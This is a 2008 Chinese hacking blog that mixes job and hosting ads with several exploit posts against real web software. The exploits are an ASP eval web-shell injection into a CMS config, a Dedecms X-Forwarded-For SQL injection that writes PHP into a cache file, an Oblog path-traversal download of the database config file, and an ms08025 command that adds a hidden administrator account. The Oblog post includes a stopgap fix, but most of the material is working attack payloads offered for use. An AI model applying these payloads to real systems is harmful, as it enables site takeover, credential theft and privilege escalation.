条件:
1.熟悉反汇编.
2.熟悉程序分析..
3.人品正直.有团队意识..
待遇:
面议..
联系方式:
QQ:274417
E-mail:tsbct@qq.com
浏览模式: 标准 | 列表全部文章
[置顶] 招聘熟悉反汇编/分析程序
Submitted by XoL-! on 2008, August 6, 7:32 PM
[置顶] 博客又回来啦....
Submitted by XoL-! on 2008, April 28, 8:43 AM
首先感谢兄弟小狼赞助俺空间...
希望这次博客继续延续下去....
各位兄弟做连接的QQ找我哈...
XoL-!'s Security Blog
另外广告下
域名注册,虚拟机主,服务器出租
需要以上服务可联系我QQ:274417
发个0day 南方数据企业最新注入漏洞
Submitted by XoL-! on 2008, September 25, 3:39 AM
原创作品,转载请注明来源,谢谢。
**************************
By:XoL-!
http://www.tsbct.com
**************************
发现日期:
2008-09-25
影响版本: v10.0 v11.0
Exploit:
获取shell方法:
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入"%><%eval(request(chr(35)))%><%'
成功把shell写入http://www.target.com/inc/config.asp
最近太忙,域名到期了,都忘记续费了
Submitted by XoL-! on 2008, July 22, 6:32 PM
最近太忙,域名到期了,都忘记续费了..
昨晚刚刚续费..哦耶..今天可以使用了...
PCSHARE VIP 2005源代码
Submitted by XoL-! on 2008, May 21, 8:58 PM
Dedecms getip()的漏洞利用
Submitted by XoL-! on 2008, May 18, 6:13 PM
author: superhei
team:http://www.ph4nt0m.org
blog:http://superhei.blogbus.com
flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:
在用户登陆后把用户信息写如了缓存:\include\inc_memberlogin.php
PHP代码
- function FushCache($mid=0)
- {
- if(emptyempty($mid)) $mid = $this->M_ID;
- $dsql = new DedeSql();
- $row = $dsql->GetOne("Select ID,userid,pwd,type,uname,membertype,money,uptime,exptime,scores,newpm From #@__member where ID='{$mid}' ");
- if(is_array($row))
- {
- $scrow = $dsql->GetOne("Select titles From #@__scores where integral<={$row['scores']} order by integral desc");
- $row['honor'] = $scrow['titles'];
- }
- if(is_array($row)) return WriteUserInfos($mid,$row); //这里
- else return '';
- }
WriteUserInfos()的代码:
//写入用户的会话信息
PHP代码
- function WriteUserInfos($uid,$row)
- {
- $tpath = ceil($uid/5000);
- $ndir = dirname(__FILE__)."/cache/user/$tpath/";
- if(!is_dir($ndir)){
- mkdir($ndir,0777);
- chmod($ndir,0777);
- }
- $userfile = $ndir.$uid.'.php';
- $infos = "<"."?php\r\n";
- $infos .= "\$cfg_userinfos['wtime'] = '".mytime()."';\r\n";
- foreach($row as $k=>$v){
- if(ereg('[^0-9]',$k)){
- $v = str_replace("'","\\'",$v); //这个是利用的关键 :)
- $v = ereg_replace("(<\?|\?>)","",$v);
- $infos .= "\$cfg_userinfos['{$k}'] = '{$v}';\r\n";
- }
- }
- $infos .= "\r\n?".">";
- @$fp = fopen($userfile,'w');
- @flock($fp);
- @fwrite($fp,$infos);
- @fclose($fp);
- return $infos;
- }
我们构造
PHP代码
- $ipp="121.11.11.1',uname=0x68656967655C273B706870696E666F28293B2F2F,uptime='1";
- mysql> select 0x68656967655C273B706870696E666F28293B2F2F;
- +--------------------------------------------+
- | 0x68656967655C273B706870696E666F28293B2F2F |
- +--------------------------------------------+
- | heige\';phpinfo();// |
- +--------------------------------------------+
- 1 row in set (0.00 sec)
利用流程:
A:
PHP代码
- else{ //成功登录
- //$ipp="121.11.11.1',uname=0x68656967655C273B706870696E666F28293B2F2F,uptime='1";
- $dsql->ExecuteNoneQuery("update #@__member set logintime='".mytime()."',loginip='".$ipp."' where ID='{$row['ID']}';");
B:FushCache()
PHP代码
- $row = $dsql->GetOne("Select ID,userid,pwd,type,uname,membertype,money,uptime,exptime,scores,newpm From #@__member where ID='{$mid}' ");
C:WriteUserInfos()
PHP代码
- heige\';phpinfo();// ---str_replace-->heige\\';phpinfo();//---fwrite--->heige\\';phpinfo();//
- ===>$cfg_userinfos['uname'] = 'heige\\';phpinfo();//'; 完美闭和前面的' :)
其中str_replace的部分相当于代码:
PHP代码
- <?php
- $v="heige\';phpinfo();//";
- $v = str_replace("'","\\'",$v);
- print $v;
- ?>
整个过程其实就是一个很完整的"二次攻击",而str_replace("'","\\'",$v);起了关键性的作用 :)
[因为这个漏洞当我pc上有那么段时间了,这个文章很多都是凭记忆写的,可能有错误,有兴趣的同学可以自己跟一下。]
发布两个非常2B的攻击程序
Submitted by XoL-! on 2008, May 14, 10:33 AM
真的补了吗 Oblog漏洞重现
Submitted by XoL-! on 2008, May 1, 9:48 PM
http://www.target.com/attachment.asp?path=./conn.asp这样已经无法下载文件,我从官方下载了最新版本4.60 Final Build080403 Access(集成了attachment.asp补丁),发现修改后的代码并不能解决问题,OBlog任意文件下载漏洞依然存在。具体看attachment.asp代码。
########################################################################
关键部分:
ASP/Visual Basic代码
- Path = Trim(Request("path")) '获取用户提交的路径
- FileID = Trim(Request("FileID"))
- If FileID ="" And Path = "" Then
- Response.Write "参数不足"
- Response.End
- End If
- ...
- If CheckDownLoad Or 1= 1Then
- If Path = "" Then
- set rs = Server.CreateObject("ADODB.RecordSet")
- link_database
- SQL = ("select file_path,userid,file_ext,ViewNum FROM oblog_upfile WHERE FileID = "CLng(FileID))
- rs.open sql,conn,1,3
- If Not rs.Eof Then
- uid = rs(1)
- file_ext = rs(2)
- rs("ViewNum") = rs("ViewNum") + 1
- rs.Update
- downloadFile Server.MapPath(rs(0)),0
- Else
- Response.Status=404
- Response.Write "该附件不存在!"
- End If
- rs.Close
- Set rs = Nothing
- Else
- If InStr(path,Oblog.CacheConfig(56)) > 0 Then 'Tr4c3标注:注意这里,仅仅判断用户提交的路径是否包含UploadFiles,为真则调用downloadfile函数下载文件
- downloadFile Server.MapPath(Path),1
- End if
- End If
- Else
- '如果附件为图片的话,当权限检验无法通过则调用一默认图片,防止<img>标记无法调用,影响显示效果
- If Path = "" Then
- Response.Status=403
- Response.Write ShowDownErr
- Response.End
- Else
- downloadFile Server.MapPath(blogdir"images/oblog_powered.gif"),1
- End if
- End if
- Set oblog = Nothing
- Sub downloadFile(strFile,stype)
- On Error Resume Next
- Server.ScriptTimeOut=9999999
- Dim S,fso,f,intFilelength,strFilename
- strFilename = strFile
- Response.Clear
- Set s = Server.CreateObject(oblog.CacheCompont(2))
- s.Open
- s.Type = 1
- Set fso = Server.CreateObject(oblog.CacheCompont(1))
- If Not fso.FileExists(strFilename) Then
- If stype = 0 Then
- Response.Status=404
- Response.Write "该附件已经被删除!"
- Exit Sub
- Else
- strFilename = Server.MapPath(blogdir"images/nopic.gif")
- End if
- End If
- Set f = fso.GetFile(strFilename)
- intFilelength = f.size
- s.LoadFromFile(strFilename)
- If Err Then
- Response.Write("<h1>错误: </h1>" & Err.Description & "<p>")
- Response.End
- End If
- Set fso=Nothing
- Dim Data
- Data=s.Read
- s.Close
- Set s=Nothing
- Dim ContentType
- select Case LCase(Right(strFile, 4))
- Case ".asp",".mdb",".config",".js" 'Tr4c3标注:再看这里,想起来什么来了?对了,前几天我发的沸腾展望新闻系统的任意下载漏洞跟这个检查的方法差不多[http://www.tr4c3.com/post/306.html],利用方法也相似,神奇的"."又派上用场了。
- Exit Sub
- Case ".asf"
- ContentType = "video/x-ms-asf"
- Case ".avi"
- ContentType = "video/avi"
- Case ".doc"
- ContentType = "application/msword"
- Case ".zip"
- ContentType = "application/zip"
- Case ".xls"
- ContentType = "application/vnd.ms-excel"
- Case ".gif"
- ContentType = "image/gif"
- Case ".jpg", "jpeg"
- ContentType = "image/jpeg"
- Case ".wav"
- ContentType = "audio/wav"
- Case ".mp3"
- ContentType = "audio/mpeg3"
- Case ".mpg", "mpeg"
- ContentType = "video/mpeg"
- Case ".rtf"
- ContentType = "application/rtf"
- Case ".htm", "html"
- ContentType = "text/html"
- Case ".txt"
- ContentType = "text/plain"
- Case Else
- ContentType = "application/octet-stream"
- End select
- If Response.IsClientConnected Then
- If Not (InStr(LCase(f.name),".gif")>0 Or InStr(LCase(f.name),".jpg")>0 Or InStr(LCase(f.name),".jpeg")>0 Or InStr(LCase(f.name),".bmp")>0 Or InStr(LCase(f.name),".png")>0 )Then
- Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
- End If
- Response.AddHeader "Content-Length", intFilelength
- Response.CharSet = "UTF-8"
- Response.ContentType = ContentType
- Response.BinaryWrite Data
- Response.Flush
- Response.Clear()
- End If
- End Sub
########################################################################
利用方法:
http://www.target.com/attachment.asp?path=UploadFiles/../conn.asp.
########################################################################
修补建议:
等待官方发布新的补丁程序。
########################################################################
临时解决办法:
将attachment.asp第5行 Path = Trim(Request("path")) 改成 Path = Replace(Trim(Request("path")),"..","")
########################################################################
ms08025
Submitted by XoL-! on 2008, April 28, 11:03 AM
ms08025
Example:
ms08025.exe "net user tsbct tsbct /add & net localgroup administrators tsbct /add"
坐骑首次亮相!!!
Submitted by XoL-! on 2008, April 28, 8:52 AM
本人坐骑首次亮相..已售...HOHO...
